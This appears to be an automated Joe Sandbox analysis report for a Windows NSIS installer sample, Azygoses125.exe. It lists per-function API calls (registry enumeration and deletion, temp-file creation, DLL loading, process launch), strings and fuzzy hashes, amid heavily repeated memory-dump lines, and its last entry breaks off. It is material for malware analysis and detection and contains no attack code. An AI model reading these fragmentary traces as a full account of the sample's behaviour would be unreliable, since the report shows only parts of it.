Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID: teProcessW
API String ID: 0-2825860339
Opcode ID: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction ID: badab6c45d1579aebeb642038854a5de2f2e9fe133ee6b5741b25705484aa732
Opcode Fuzzy Hash: f55e986299dffb9fb67cabe2458bae2281fa53825949e9f46481d15298381b70
Instruction Fuzzy Hash: 9A816731D04228DBDF24CFA8C844BADBBB0FF44305F21856AD856BB281D7796A86DF45

Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
RegCloseKey.ADVAPI32(?), ref: 00402C65
RegCloseKey.ADVAPI32(?), ref: 00402C8A
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

Function 004031EF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403203

Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 00403236
SetFilePointer.KERNELBASE(00A3ED35,00000000,00000000,00414EF0,00004000,?,00000000,00403119,00000004,00000000,00000000,0040A230,?,00403093,000000FF,00000000), ref: 00403331

Strings

teProcessW, xrefs: 00403248, 004032E3

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: teProcessW
API String ID: 1092082344-2825860339
Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D

Function 00406050 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE

Strings

: Completed, xrefs: 00406053

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: : Completed
API String ID: 3677997916-2954849223
Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

Function 00405D87 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405DA5
GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004035E2), ref: 00405DC0

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405D8C
nsa, xrefs: 00405D94

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$nsa
API String ID: 1716503409-3083371207
Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64

Function 004064ED Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
wsprintfW.USER32 ref: 0040653F
LoadLibraryW.KERNELBASE(?), ref: 0040654F

Strings

%s%S.dll, xrefs: 00406539

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction ID: 11474a94a5346637ca65755d9fadb0746d9ddd5a59e85512782e335858fea3cf
Opcode Fuzzy Hash: 09826aabd0149e8bfb8f53993160eab8b7fb3c89a4591f3bb3682bc3d10a664a
Instruction Fuzzy Hash: 11F0BB7050011AA7CB14EB68ED0DDAF3AACAB00304F51447A9546F20D5EB7CDA65CBA8

Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

Part of subcall function 00405863: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
Opcode Fuzzy Hash: 73a2db533e28582b59bffcf672c1af26545eacf5a16fa5e71084c627cf33175b
Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 004057B1: CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\), ref: 004057F4

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\magmaet\clenched,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401638

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\magmaet\clenched
API String ID: 1892508949-3268208382
Opcode ID: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction ID: a2f5b5d24782e44cfe925c0e95e15c4f451f46d0d0cd4eeea64ba36cf6c5c766
Opcode Fuzzy Hash: 5baa3a048ccbd20e590b93de0caadb45672d703fd938becdea7bafa1427ea88e
Instruction Fuzzy Hash: AC11E631504504EBCF20BFA0CD0199E3AB1EF44364B29453BE945B61F1DA3D8A81DA5E

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190

Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405BF0
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0,"C:\Users\user\Desktop\Azygoses125.exe"), ref: 00405C98
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 00405CA8

Strings

P_B, xrefs: 00405C45

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E

Function 00405863 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
CloseHandle.KERNEL32(0040A230), ref: 00405899

Strings

Error launching installer, xrefs: 00405876

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78

Function 00406C7C Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction ID: 29bb6eb7f5aafbc6e445c06f8dac873239588b1e002d851f56b7f63b732aee86
Opcode Fuzzy Hash: 8c1f6239bfa1496998a371feb9f956813f4bb707a4bc8307f638f0ab127b8830
Instruction Fuzzy Hash: A9A14471D00229CBDB28CFA8C844BADBBB1FF44305F21856ED856BB281D7785A86CF44

Function 00406E7D Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
